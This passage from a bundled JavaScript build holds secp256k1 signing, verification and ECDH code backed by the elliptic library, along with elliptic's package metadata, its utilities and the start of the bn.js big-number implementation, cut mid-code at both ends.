            if (options.data !== undefined) $b3cd3c4411d4f56b$var$isUint8Array("options.data", options.data);
            if (options.noncefn !== undefined) $b3cd3c4411d4f56b$var$assert($b3cd3c4411d4f56b$var$toTypeString(options.noncefn) === "Function", "Expected options.noncefn to be a Function");
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, 64);
            const obj = {
                signature: output,
                recid: null
            };
            switch(secp256k1.ecdsaSign(obj, msg32, seckey, options.data, options.noncefn)){
                case 0:
                    return obj;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.SIGN);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.IMPOSSIBLE_CASE);
            }
        },
        ecdsaVerify (sig, msg32, pubkey) {
            $b3cd3c4411d4f56b$var$isUint8Array("signature", sig, 64);
            $b3cd3c4411d4f56b$var$isUint8Array("message", msg32, 32);
            $b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            switch(secp256k1.ecdsaVerify(sig, msg32, pubkey)){
                case 0:
                    return true;
                case 3:
                    return false;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.SIG_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_PARSE);
            }
        },
        ecdsaRecover (sig, recid, msg32, compressed = true, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("signature", sig, 64);
            $b3cd3c4411d4f56b$var$assert($b3cd3c4411d4f56b$var$toTypeString(recid) === "Number" && recid >= 0 && recid <= 3, "Expected recovery id to be a Number within interval [0, 3]");
            $b3cd3c4411d4f56b$var$isUint8Array("message", msg32, 32);
            $b3cd3c4411d4f56b$var$isCompressed(compressed);
            output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, compressed ? 33 : 65);
            switch(secp256k1.ecdsaRecover(output, sig, recid, msg32)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.SIG_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.RECOVER);
                case 3:
                    throw new Error($b3cd3c4411d4f56b$var$errors.IMPOSSIBLE_CASE);
            }
        },
        ecdh (pubkey, seckey, options = {}, output) {
            $b3cd3c4411d4f56b$var$isUint8Array("public key", pubkey, [
                33,
                65
            ]);
            $b3cd3c4411d4f56b$var$isUint8Array("private key", seckey, 32);
            $b3cd3c4411d4f56b$var$assert($b3cd3c4411d4f56b$var$toTypeString(options) === "Object", "Expected options to be an Object");
            if (options.data !== undefined) $b3cd3c4411d4f56b$var$isUint8Array("options.data", options.data);
            if (options.hashfn !== undefined) {
                $b3cd3c4411d4f56b$var$assert($b3cd3c4411d4f56b$var$toTypeString(options.hashfn) === "Function", "Expected options.hashfn to be a Function");
                if (options.xbuf !== undefined) $b3cd3c4411d4f56b$var$isUint8Array("options.xbuf", options.xbuf, 32);
                if (options.ybuf !== undefined) $b3cd3c4411d4f56b$var$isUint8Array("options.ybuf", options.ybuf, 32);
                $b3cd3c4411d4f56b$var$isUint8Array("output", output);
            } else output = $b3cd3c4411d4f56b$var$getAssertedOutput(output, 32);
            switch(secp256k1.ecdh(output, pubkey, seckey, options.data, options.hashfn, options.xbuf, options.ybuf)){
                case 0:
                    return output;
                case 1:
                    throw new Error($b3cd3c4411d4f56b$var$errors.PUBKEY_PARSE);
                case 2:
                    throw new Error($b3cd3c4411d4f56b$var$errors.ECDH);
            }
        }
    };
};

});

parcelRequire.register("ejO33", function(module, exports) {

var $1zUcV = parcelRequire("1zUcV");
var $a6c9a9981cef49fd$require$EC = $1zUcV.ec;
const $a6c9a9981cef49fd$var$ec = new $a6c9a9981cef49fd$require$EC("secp256k1");
const $a6c9a9981cef49fd$var$ecparams = $a6c9a9981cef49fd$var$ec.curve;
// Hack, we can not use bn.js@5, while elliptic uses bn.js@4
// See https://github.com/indutny/elliptic/issues/191#issuecomment-569888758
const $a6c9a9981cef49fd$var$BN = $a6c9a9981cef49fd$var$ecparams.n.constructor;
function $a6c9a9981cef49fd$var$loadCompressedPublicKey(first, xbuf) {
    let x = new $a6c9a9981cef49fd$var$BN(xbuf);
    // overflow
    if (x.cmp($a6c9a9981cef49fd$var$ecparams.p) >= 0) return null;
    x = x.toRed($a6c9a9981cef49fd$var$ecparams.red);
    // compute corresponding Y
    let y = x.redSqr().redIMul(x).redIAdd($a6c9a9981cef49fd$var$ecparams.b).redSqrt();
    if (first === 0x03 !== y.isOdd()) y = y.redNeg();
    return $a6c9a9981cef49fd$var$ec.keyPair({
        pub: {
            x: x,
            y: y
        }
    });
}
function $a6c9a9981cef49fd$var$loadUncompressedPublicKey(first, xbuf, ybuf) {
    let x = new $a6c9a9981cef49fd$var$BN(xbuf);
    let y = new $a6c9a9981cef49fd$var$BN(ybuf);
    // overflow
    if (x.cmp($a6c9a9981cef49fd$var$ecparams.p) >= 0 || y.cmp($a6c9a9981cef49fd$var$ecparams.p) >= 0) return null;
    x = x.toRed($a6c9a9981cef49fd$var$ecparams.red);
    y = y.toRed($a6c9a9981cef49fd$var$ecparams.red);
    // is odd flag
    if ((first === 0x06 || first === 0x07) && y.isOdd() !== (first === 0x07)) return null;
    // x*x*x + b = y*y
    const x3 = x.redSqr().redIMul(x);
    if (!y.redSqr().redISub(x3.redIAdd($a6c9a9981cef49fd$var$ecparams.b)).isZero()) return null;
    return $a6c9a9981cef49fd$var$ec.keyPair({
        pub: {
            x: x,
            y: y
        }
    });
}
function $a6c9a9981cef49fd$var$loadPublicKey(pubkey) {
    // length should be validated in interface
    const first = pubkey[0];
    switch(first){
        case 0x02:
        case 0x03:
            if (pubkey.length !== 33) return null;
            return $a6c9a9981cef49fd$var$loadCompressedPublicKey(first, pubkey.subarray(1, 33));
        case 0x04:
        case 0x06:
        case 0x07:
            if (pubkey.length !== 65) return null;
            return $a6c9a9981cef49fd$var$loadUncompressedPublicKey(first, pubkey.subarray(1, 33), pubkey.subarray(33, 65));
        default:
            return null;
    }
}
function $a6c9a9981cef49fd$var$savePublicKey(output, point) {
    const pubkey = point.encode(null, output.length === 33);
    // Loop should be faster because we do not need create extra Uint8Array
    // output.set(new Uint8Array(pubkey))
    for(let i = 0; i < output.length; ++i)output[i] = pubkey[i];
}
module.exports = {
    contextRandomize () {
        return 0;
    },
    privateKeyVerify (seckey) {
        const bn = new $a6c9a9981cef49fd$var$BN(seckey);
        return bn.cmp($a6c9a9981cef49fd$var$ecparams.n) < 0 && !bn.isZero() ? 0 : 1;
    },
    privateKeyNegate (seckey) {
        const bn = new $a6c9a9981cef49fd$var$BN(seckey);
        const negate = $a6c9a9981cef49fd$var$ecparams.n.sub(bn).umod($a6c9a9981cef49fd$var$ecparams.n).toArrayLike(Uint8Array, "be", 32);
        seckey.set(negate);
        return 0;
    },
    privateKeyTweakAdd (seckey, tweak) {
        const bn = new $a6c9a9981cef49fd$var$BN(tweak);
        if (bn.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) return 1;
        bn.iadd(new $a6c9a9981cef49fd$var$BN(seckey));
        if (bn.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) bn.isub($a6c9a9981cef49fd$var$ecparams.n);
        if (bn.isZero()) return 1;
        const tweaked = bn.toArrayLike(Uint8Array, "be", 32);
        seckey.set(tweaked);
        return 0;
    },
    privateKeyTweakMul (seckey, tweak) {
        let bn = new $a6c9a9981cef49fd$var$BN(tweak);
        if (bn.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || bn.isZero()) return 1;
        bn.imul(new $a6c9a9981cef49fd$var$BN(seckey));
        if (bn.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) bn = bn.umod($a6c9a9981cef49fd$var$ecparams.n);
        const tweaked = bn.toArrayLike(Uint8Array, "be", 32);
        seckey.set(tweaked);
        return 0;
    },
    publicKeyVerify (pubkey) {
        const pair = $a6c9a9981cef49fd$var$loadPublicKey(pubkey);
        return pair === null ? 1 : 0;
    },
    publicKeyCreate (output, seckey) {
        const bn = new $a6c9a9981cef49fd$var$BN(seckey);
        if (bn.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || bn.isZero()) return 1;
        const point = $a6c9a9981cef49fd$var$ec.keyFromPrivate(seckey).getPublic();
        $a6c9a9981cef49fd$var$savePublicKey(output, point);
        return 0;
    },
    publicKeyConvert (output, pubkey) {
        const pair = $a6c9a9981cef49fd$var$loadPublicKey(pubkey);
        if (pair === null) return 1;
        const point = pair.getPublic();
        $a6c9a9981cef49fd$var$savePublicKey(output, point);
        return 0;
    },
    publicKeyNegate (output, pubkey) {
        const pair = $a6c9a9981cef49fd$var$loadPublicKey(pubkey);
        if (pair === null) return 1;
        const point = pair.getPublic();
        point.y = point.y.redNeg();
        $a6c9a9981cef49fd$var$savePublicKey(output, point);
        return 0;
    },
    publicKeyCombine (output, pubkeys) {
        const pairs = new Array(pubkeys.length);
        for(let i = 0; i < pubkeys.length; ++i){
            pairs[i] = $a6c9a9981cef49fd$var$loadPublicKey(pubkeys[i]);
            if (pairs[i] === null) return 1;
        }
        let point = pairs[0].getPublic();
        for(let i = 1; i < pairs.length; ++i)point = point.add(pairs[i].pub);
        if (point.isInfinity()) return 2;
        $a6c9a9981cef49fd$var$savePublicKey(output, point);
        return 0;
    },
    publicKeyTweakAdd (output, pubkey, tweak) {
        const pair = $a6c9a9981cef49fd$var$loadPublicKey(pubkey);
        if (pair === null) return 1;
        tweak = new $a6c9a9981cef49fd$var$BN(tweak);
        if (tweak.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) return 2;
        const point = pair.getPublic().add($a6c9a9981cef49fd$var$ecparams.g.mul(tweak));
        if (point.isInfinity()) return 2;
        $a6c9a9981cef49fd$var$savePublicKey(output, point);
        return 0;
    },
    publicKeyTweakMul (output, pubkey, tweak) {
        const pair = $a6c9a9981cef49fd$var$loadPublicKey(pubkey);
        if (pair === null) return 1;
        tweak = new $a6c9a9981cef49fd$var$BN(tweak);
        if (tweak.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || tweak.isZero()) return 2;
        const point = pair.getPublic().mul(tweak);
        $a6c9a9981cef49fd$var$savePublicKey(output, point);
        return 0;
    },
    signatureNormalize (sig) {
        const r = new $a6c9a9981cef49fd$var$BN(sig.subarray(0, 32));
        const s = new $a6c9a9981cef49fd$var$BN(sig.subarray(32, 64));
        if (r.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || s.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) return 1;
        if (s.cmp($a6c9a9981cef49fd$var$ec.nh) === 1) sig.set($a6c9a9981cef49fd$var$ecparams.n.sub(s).toArrayLike(Uint8Array, "be", 32), 32);
        return 0;
    },
    // Copied 1-to-1 from https://github.com/bitcoinjs/bip66/blob/master/index.js
    // Adapted for Uint8Array instead Buffer
    signatureExport (obj, sig) {
        const sigR = sig.subarray(0, 32);
        const sigS = sig.subarray(32, 64);
        if (new $a6c9a9981cef49fd$var$BN(sigR).cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) return 1;
        if (new $a6c9a9981cef49fd$var$BN(sigS).cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) return 1;
        const { output: output } = obj;
        // Prepare R
        let r = output.subarray(4, 37);
        r[0] = 0x00;
        r.set(sigR, 1);
        let lenR = 33;
        let posR = 0;
        for(; lenR > 1 && r[posR] === 0x00 && !(r[posR + 1] & 0x80); --lenR, ++posR);
        r = r.subarray(posR);
        if (r[0] & 0x80) return 1;
        if (lenR > 1 && r[0] === 0x00 && !(r[1] & 0x80)) return 1;
        // Prepare S
        let s = output.subarray(39, 72);
        s[0] = 0x00;
        s.set(sigS, 1);
        let lenS = 33;
        let posS = 0;
        for(; lenS > 1 && s[posS] === 0x00 && !(s[posS + 1] & 0x80); --lenS, ++posS);
        s = s.subarray(posS);
        if (s[0] & 0x80) return 1;
        if (lenS > 1 && s[0] === 0x00 && !(s[1] & 0x80)) return 1;
        // Set output length for return
        obj.outputlen = 6 + lenR + lenS;
        // Output in specified format
        // 0x30 [total-length] 0x02 [R-length] [R] 0x02 [S-length] [S]
        output[0] = 0x30;
        output[1] = obj.outputlen - 2;
        output[2] = 0x02;
        output[3] = r.length;
        output.set(r, 4);
        output[4 + lenR] = 0x02;
        output[5 + lenR] = s.length;
        output.set(s, 6 + lenR);
        return 0;
    },
    // Copied 1-to-1 from https://github.com/bitcoinjs/bip66/blob/master/index.js
    // Adapted for Uint8Array instead Buffer
    signatureImport (output, sig) {
        if (sig.length < 8) return 1;
        if (sig.length > 72) return 1;
        if (sig[0] !== 0x30) return 1;
        if (sig[1] !== sig.length - 2) return 1;
        if (sig[2] !== 0x02) return 1;
        const lenR = sig[3];
        if (lenR === 0) return 1;
        if (5 + lenR >= sig.length) return 1;
        if (sig[4 + lenR] !== 0x02) return 1;
        const lenS = sig[5 + lenR];
        if (lenS === 0) return 1;
        if (6 + lenR + lenS !== sig.length) return 1;
        if (sig[4] & 0x80) return 1;
        if (lenR > 1 && sig[4] === 0x00 && !(sig[5] & 0x80)) return 1;
        if (sig[lenR + 6] & 0x80) return 1;
        if (lenS > 1 && sig[lenR + 6] === 0x00 && !(sig[lenR + 7] & 0x80)) return 1;
        let sigR = sig.subarray(4, 4 + lenR);
        if (sigR.length === 33 && sigR[0] === 0x00) sigR = sigR.subarray(1);
        if (sigR.length > 32) return 1;
        let sigS = sig.subarray(6 + lenR);
        if (sigS.length === 33 && sigS[0] === 0x00) sigS = sigS.slice(1);
        if (sigS.length > 32) throw new Error("S length is too long");
        let r = new $a6c9a9981cef49fd$var$BN(sigR);
        if (r.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) r = new $a6c9a9981cef49fd$var$BN(0);
        let s = new $a6c9a9981cef49fd$var$BN(sig.subarray(6 + lenR));
        if (s.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) s = new $a6c9a9981cef49fd$var$BN(0);
        output.set(r.toArrayLike(Uint8Array, "be", 32), 0);
        output.set(s.toArrayLike(Uint8Array, "be", 32), 32);
        return 0;
    },
    ecdsaSign (obj, message, seckey, data, noncefn) {
        if (noncefn) {
            const _noncefn = noncefn;
            noncefn = (counter)=>{
                const nonce = _noncefn(message, seckey, null, data, counter);
                const isValid = nonce instanceof Uint8Array && nonce.length === 32;
                if (!isValid) throw new Error("This is the way");
                return new $a6c9a9981cef49fd$var$BN(nonce);
            };
        }
        const d = new $a6c9a9981cef49fd$var$BN(seckey);
        if (d.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || d.isZero()) return 1;
        let sig;
        try {
            sig = $a6c9a9981cef49fd$var$ec.sign(message, seckey, {
                canonical: true,
                k: noncefn,
                pers: data
            });
        } catch (err) {
            return 1;
        }
        obj.signature.set(sig.r.toArrayLike(Uint8Array, "be", 32), 0);
        obj.signature.set(sig.s.toArrayLike(Uint8Array, "be", 32), 32);
        obj.recid = sig.recoveryParam;
        return 0;
    },
    ecdsaVerify (sig, msg32, pubkey) {
        const sigObj = {
            r: sig.subarray(0, 32),
            s: sig.subarray(32, 64)
        };
        const sigr = new $a6c9a9981cef49fd$var$BN(sigObj.r);
        const sigs = new $a6c9a9981cef49fd$var$BN(sigObj.s);
        if (sigr.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || sigs.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) return 1;
        if (sigs.cmp($a6c9a9981cef49fd$var$ec.nh) === 1 || sigr.isZero() || sigs.isZero()) return 3;
        const pair = $a6c9a9981cef49fd$var$loadPublicKey(pubkey);
        if (pair === null) return 2;
        const point = pair.getPublic();
        const isValid = $a6c9a9981cef49fd$var$ec.verify(msg32, sigObj, point);
        return isValid ? 0 : 3;
    },
    ecdsaRecover (output, sig, recid, msg32) {
        const sigObj = {
            r: sig.slice(0, 32),
            s: sig.slice(32, 64)
        };
        const sigr = new $a6c9a9981cef49fd$var$BN(sigObj.r);
        const sigs = new $a6c9a9981cef49fd$var$BN(sigObj.s);
        if (sigr.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || sigs.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0) return 1;
        if (sigr.isZero() || sigs.isZero()) return 2;
        // Can throw `throw new Error('Unable to find sencond key candinate');`
        let point;
        try {
            point = $a6c9a9981cef49fd$var$ec.recoverPubKey(msg32, sigObj, recid);
        } catch (err) {
            return 2;
        }
        $a6c9a9981cef49fd$var$savePublicKey(output, point);
        return 0;
    },
    ecdh (output, pubkey, seckey, data, hashfn, xbuf, ybuf) {
        const pair = $a6c9a9981cef49fd$var$loadPublicKey(pubkey);
        if (pair === null) return 1;
        const scalar = new $a6c9a9981cef49fd$var$BN(seckey);
        if (scalar.cmp($a6c9a9981cef49fd$var$ecparams.n) >= 0 || scalar.isZero()) return 2;
        const point = pair.getPublic().mul(scalar);
        if (hashfn === undefined) {
            const data = point.encode(null, true);
            const sha256 = $a6c9a9981cef49fd$var$ec.hash().update(data).digest();
            for(let i = 0; i < 32; ++i)output[i] = sha256[i];
        } else {
            if (!xbuf) xbuf = new Uint8Array(32);
            const x = point.getX().toArray("be", 32);
            for(let i = 0; i < 32; ++i)xbuf[i] = x[i];
            if (!ybuf) ybuf = new Uint8Array(32);
            const y = point.getY().toArray("be", 32);
            for(let i = 0; i < 32; ++i)ybuf[i] = y[i];
            const hash = hashfn(xbuf, ybuf, data);
            const isValid = hash instanceof Uint8Array && hash.length === output.length;
            if (!isValid) return 2;
            output.set(hash);
        }
        return 0;
    }
};

});
parcelRequire.register("1zUcV", function(module, exports) {
"use strict";
var $1264a8f63e75be39$var$elliptic = module.exports;

$1264a8f63e75be39$var$elliptic.version = (parcelRequire("fuV4H")).version;

$1264a8f63e75be39$var$elliptic.utils = (parcelRequire("gEVtY"));

$1264a8f63e75be39$var$elliptic.rand = (parcelRequire("7JHF0"));

$1264a8f63e75be39$var$elliptic.curve = (parcelRequire("cP1GP"));

$1264a8f63e75be39$var$elliptic.curves = (parcelRequire("fbTbW"));

// Protocols
$1264a8f63e75be39$var$elliptic.ec = (parcelRequire("220Zx"));

$1264a8f63e75be39$var$elliptic.eddsa = (parcelRequire("esmmS"));

});
parcelRequire.register("fuV4H", function(module, exports) {
module.exports = JSON.parse('{"name":"elliptic","version":"6.5.4","description":"EC cryptography","main":"lib/elliptic.js","files":["lib"],"scripts":{"lint":"eslint lib test","lint:fix":"npm run lint -- --fix","unit":"istanbul test _mocha --reporter=spec test/index.js","test":"npm run lint && npm run unit","version":"grunt dist && git add dist/"},"repository":{"type":"git","url":"git@github.com:indutny/elliptic"},"keywords":["EC","Elliptic","curve","Cryptography"],"author":"Fedor Indutny <fedor@indutny.com>","license":"MIT","bugs":{"url":"https://github.com/indutny/elliptic/issues"},"homepage":"https://github.com/indutny/elliptic","devDependencies":{"brfs":"^2.0.2","coveralls":"^3.1.0","eslint":"^7.6.0","grunt":"^1.2.1","grunt-browserify":"^5.3.0","grunt-cli":"^1.3.2","grunt-contrib-connect":"^3.0.0","grunt-contrib-copy":"^1.0.0","grunt-contrib-uglify":"^5.0.0","grunt-mocha-istanbul":"^5.0.2","grunt-saucelabs":"^9.0.1","istanbul":"^0.4.5","mocha":"^8.0.1"},"dependencies":{"bn.js":"^4.11.9","brorand":"^1.1.0","hash.js":"^1.0.0","hmac-drbg":"^1.0.1","inherits":"^2.0.4","minimalistic-assert":"^1.0.1","minimalistic-crypto-utils":"^1.0.1"}}');

});

parcelRequire.register("gEVtY", function(module, exports) {
"use strict";
var $c20cf89948514165$var$utils = module.exports;

var $jX0xT = parcelRequire("jX0xT");

var $koC21 = parcelRequire("koC21");

var $lC4vN = parcelRequire("lC4vN");
$c20cf89948514165$var$utils.assert = $koC21;
$c20cf89948514165$var$utils.toArray = $lC4vN.toArray;
$c20cf89948514165$var$utils.zero2 = $lC4vN.zero2;
$c20cf89948514165$var$utils.toHex = $lC4vN.toHex;
$c20cf89948514165$var$utils.encode = $lC4vN.encode;
// Represent num in a w-NAF form
function $c20cf89948514165$var$getNAF(num, w, bits) {
    var naf = new Array(Math.max(num.bitLength(), bits) + 1);
    naf.fill(0);
    var ws = 1 << w + 1;
    var k = num.clone();
    for(var i = 0; i < naf.length; i++){
        var z;
        var mod = k.andln(ws - 1);
        if (k.isOdd()) {
            if (mod > (ws >> 1) - 1) z = (ws >> 1) - mod;
            else z = mod;
            k.isubn(z);
        } else z = 0;
        naf[i] = z;
        k.iushrn(1);
    }
    return naf;
}
$c20cf89948514165$var$utils.getNAF = $c20cf89948514165$var$getNAF;
// Represent k1, k2 in a Joint Sparse Form
function $c20cf89948514165$var$getJSF(k1, k2) {
    var jsf = [
        [],
        []
    ];
    k1 = k1.clone();
    k2 = k2.clone();
    var d1 = 0;
    var d2 = 0;
    var m8;
    while(k1.cmpn(-d1) > 0 || k2.cmpn(-d2) > 0){
        // First phase
        var m14 = k1.andln(3) + d1 & 3;
        var m24 = k2.andln(3) + d2 & 3;
        if (m14 === 3) m14 = -1;
        if (m24 === 3) m24 = -1;
        var u1;
        if ((m14 & 1) === 0) u1 = 0;
        else {
            m8 = k1.andln(7) + d1 & 7;
            if ((m8 === 3 || m8 === 5) && m24 === 2) u1 = -m14;
            else u1 = m14;
        }
        jsf[0].push(u1);
        var u2;
        if ((m24 & 1) === 0) u2 = 0;
        else {
            m8 = k2.andln(7) + d2 & 7;
            if ((m8 === 3 || m8 === 5) && m14 === 2) u2 = -m24;
            else u2 = m24;
        }
        jsf[1].push(u2);
        // Second phase
        if (2 * d1 === u1 + 1) d1 = 1 - d1;
        if (2 * d2 === u2 + 1) d2 = 1 - d2;
        k1.iushrn(1);
        k2.iushrn(1);
    }
    return jsf;
}
$c20cf89948514165$var$utils.getJSF = $c20cf89948514165$var$getJSF;
function $c20cf89948514165$var$cachedProperty(obj, name, computer) {
    var key = "_" + name;
    obj.prototype[name] = function cachedProperty() {
        return this[key] !== undefined ? this[key] : this[key] = computer.call(this);
    };
}
$c20cf89948514165$var$utils.cachedProperty = $c20cf89948514165$var$cachedProperty;
function $c20cf89948514165$var$parseBytes(bytes) {
    return typeof bytes === "string" ? $c20cf89948514165$var$utils.toArray(bytes, "hex") : bytes;
}
$c20cf89948514165$var$utils.parseBytes = $c20cf89948514165$var$parseBytes;
function $c20cf89948514165$var$intFromLE(bytes) {
    return new $jX0xT(bytes, "hex", "le");
}
$c20cf89948514165$var$utils.intFromLE = $c20cf89948514165$var$intFromLE;

});
parcelRequire.register("jX0xT", function(module, exports) {

(function(module1, exports) {
    "use strict";
    // Utils
    function assert(val, msg) {
        if (!val) throw new Error(msg || "Assertion failed");
    }
    // Could use `inherits` module, but don't want to move from single file
    // architecture yet.
    function inherits(ctor, superCtor) {
        ctor.super_ = superCtor;
        var TempCtor = function() {};
        TempCtor.prototype = superCtor.prototype;
        ctor.prototype = new TempCtor();
        ctor.prototype.constructor = ctor;
    }
    // BN
    function BN(number, base, endian) {
        if (BN.isBN(number)) return number;
        this.negative = 0;
        this.words = null;
        this.length = 0;
        // Reduction context
        this.red = null;
        if (number !== null) {
            if (base === "le" || base === "be") {
                endian = base;
                base = 10;
            }
            this._init(number || 0, base || 10, endian || "be");
        }
    }
    if (typeof module1 === "object") module1.exports = BN;
    else exports.BN = BN;
    BN.BN = BN;
    BN.wordSize = 26;
    var Buffer;
    try {
        if (typeof window !== "undefined" && typeof window.Buffer !== "undefined") Buffer = window.Buffer;
        else Buffer = (parcelRequire("kjyEk")).Buffer;
    } catch (e) {}
    BN.isBN = function isBN(num) {
        if (num instanceof BN) return true;
        return num !== null && typeof num === "object" && num.constructor.wordSize === BN.wordSize && Array.isArray(num.words);
    };
    BN.max = function max(left, right) {
        if (left.cmp(right) > 0) return left;
        return right;
    };
    BN.min = function min(left, right) {
        if (left.cmp(right) < 0) return left;
        return right;
    };
    BN.prototype._init = function init(number, base, endian) {
        if (typeof number === "number") return this._initNumber(number, base, endian);
        if (typeof number === "object") return this._initArray(number, base, endian);
        if (base === "hex") base = 16;
        assert(base === (base | 0) && base >= 2 && base <= 36);
        number = number.toString().replace(/\s+/g, "");
        var start = 0;
        if (number[0] === "-") {
            start++;
            this.negative = 1;
        }
        if (start < number.length) {
            if (base === 16) this._parseHex(number, start, endian);
            else {
                this._parseBase(number, base, start);
                if (endian === "le") this._initArray(this.toArray(), base, endian);
            }
        }
    };
    BN.prototype._initNumber = function _initNumber(number, base, endian) {
        if (number < 0) {
            this.negative = 1;
            number = -number;
        }
        if (number < 0x4000000) {
            this.words = [
                number & 0x3ffffff
            ];
            this.length = 1;
        } else if (number < 0x10000000000000) {
            this.words = [
                number & 0x3ffffff,
                number / 0x4000000 & 0x3ffffff
            ];
            this.length = 2;
        } else {
            assert(number < 0x20000000000000); // 2 ^ 53 (unsafe)
            this.words = [
                number & 0x3ffffff,
                number / 0x4000000 & 0x3ffffff,
                1
            ];
            this.length = 3;
        }
        if (endian !== "le") return;
        // Reverse the bytes
        this._initArray(this.toArray(), base, endian);
    };
    BN.prototype._initArray = function _initArray(number, base, endian) {
        // Perhaps a Uint8Array
        assert(typeof number.length === "number");
        if (number.length <= 0) {
            this.words = [
                0
            ];
            this.length = 1;
            return this;
        }
        this.length = Math.ceil(number.length / 3);
        this.words = new Array(this.length);
        for(var i = 0; i < this.length; i++)this.words[i] = 0;
        var j, w;
        var off = 0;
        if (endian === "be") for(i = number.length - 1, j = 0; i >= 0; i -= 3){
            w = number[i] | number[i - 1] << 8 | number[i - 2] << 16;
            this.words[j] |= w << off & 0x3ffffff;
            this.words[j + 1] = w >>> 26 - off & 0x3ffffff;
            off += 24;
            if (off >= 26) {
                off -= 26;
                j++;
            }
        }
        else if (endian === "le") for(i = 0, j = 0; i < number.length; i += 3){
            w = number[i] | number[i + 1] << 8 | number[i + 2] << 16;
            this.words[j] |= w << off & 0x3ffffff;
            this.words[j + 1] = w >>> 26 - off & 0x3ffffff;
            off += 24;
            if (off >= 26) {
                off -= 26;
                j++;
            }
        }
        return this.strip();
    };
    function parseHex4Bits(string, index) {
        var c = string.charCodeAt(index);
        // 'A' - 'F'
        if (c >= 65 && c <= 70) return c - 55;
        else if (c >= 97 && c <= 102) return c - 87;
        else return c - 48 & 0xf;
    }
    function parseHexByte(string, lowerBound, index) {
        var r = parseHex4Bits(string, index);
        if (index - 1 >= lowerBound) r |= parseHex4Bits(string, index - 1) << 4;
        return r;
    }
    BN.prototype._parseHex = function _parseHex(number, start, endian) {
        // Create possibly bigger array to ensure that it fits the number
        this.length = Math.ceil((number.length - start) / 6);
        this.words = new Array(this.length);
        for(var i = 0; i < this.length; i++)this.words[i] = 0;
        // 24-bits chunks
        var off = 0;
        var j = 0;
        var w;
        if (endian === "be") for(i = number.length - 1; i >= start; i -= 2){
            w = parseHexByte(number, start, i) << off;
            this.words[j] |= w & 0x3ffffff;
            if (off >= 18) {
                off -= 18;
                j += 1;
                this.words[j] |= w >>> 26;
            } else off += 8;
        }
        else {
            var parseLength = number.length - start;
            for(i = parseLength % 2 === 0 ? start + 1 : start; i < number.length; i += 2){
                w = parseHexByte(number, start, i) << off;
                this.words[j] |= w & 0x3ffffff;
                if (off >= 18) {
                    off -= 18;
                    j += 1;
                    this.words[j] |= w >>> 26;
                } else off += 8;
            }
        }
        this.strip();
    };
    function parseBase(str, start, end, mul) {
        var r = 0;
        var len = Math.min(str.length, end);
        for(var i = start; i < len; i++){
            var c = str.charCodeAt(i) - 48;
            r *= mul;
            // 'a'
            if (c >= 49) r += c - 49 + 0xa;
            else if (c >= 17) r += c - 17 + 0xa;
            else r += c;
        }
        return r;
    }
    BN.prototype._parseBase = function _parseBase(number, base, start) {
        // Initialize as zero
        this.words = [
            0
        ];
        this.length = 1;
        // Find length of limb in base
        for(var limbLen = 0, limbPow = 1; limbPow <= 0x3ffffff; limbPow *= base)limbLen++;
        limbLen--;
        limbPow = limbPow / base | 0;
        var total = number.length - start;
        var mod = total % limbLen;
        var end = Math.min(total, total - mod) + start;
        var word = 0;
        for(var i = start; i < end; i += limbLen){
            word = parseBase(number, i, i + limbLen, base);
            this.imuln(limbPow);
            if (this.words[0] + word < 0x4000000) this.words[0] += word;
            else this._iaddn(word);
        }
        if (mod !== 0) {
            var pow = 1;
            word = parseBase(number, i, number.length, base);
            for(i = 0; i < mod; i++)pow *= base;
            this.imuln(pow);
            if (this.words[0] + word < 0x4000000) this.words[0] += word;
            else this._iaddn(word);
        }
        this.strip();
    };
    BN.prototype.copy = function copy(dest) {
        dest.words = new Array(this.length);
        for(var i = 0; i < this.length; i++)dest.words[i] = this.words[i];
        dest.length = this.length;
        dest.negative = this.negative;
        dest.red = this.red;
    };
    BN.prototype.clone = function clone() {
        var r = new BN(null);
        this.copy(r);
        return r;
    };
    BN.prototype._expand = function _expand(size) {
        while(this.length < size)this.words[this.length++] = 0;
        return this;
    };
    // Remove leading `0` from `this`
    BN.prototype.strip = function strip() {
        while(this.length > 1 && this.words[this.length - 1] === 0)this.length--;
        return this._normSign();
    };
    BN.prototype._normSign = function _normSign() {
        // -0 = 0
        if (this.length === 1 && this.words[0] === 0) this.negative = 0;
        return this;
    };
    BN.prototype.inspect = function inspect() {
        return (this.red ? "<BN-R: " : "<BN: ") + this.toString(16) + ">";
    };
    /*

  var zeros = [];
  var groupSizes = [];
  var groupBases = [];

  var s = '';
  var i = -1;
  while (++i < BN.wordSize) {
    zeros[i] = s;
    s += '0';
  }
  groupSizes[0] = 0;
  groupSizes[1] = 0;
  groupBases[0] = 0;
  groupBases[1] = 0;
  var base = 2 - 1;
  while (++base < 36 + 1) {
    var groupSize = 0;
    var groupBase = 1;
    while (groupBase < (1 << BN.wordSize) / base) {
      groupBase *= base;
      groupSize += 1;
    }
    groupSizes[base] = groupSize;
    groupBases[base] = groupBase;
  }

  */ var zeros = [
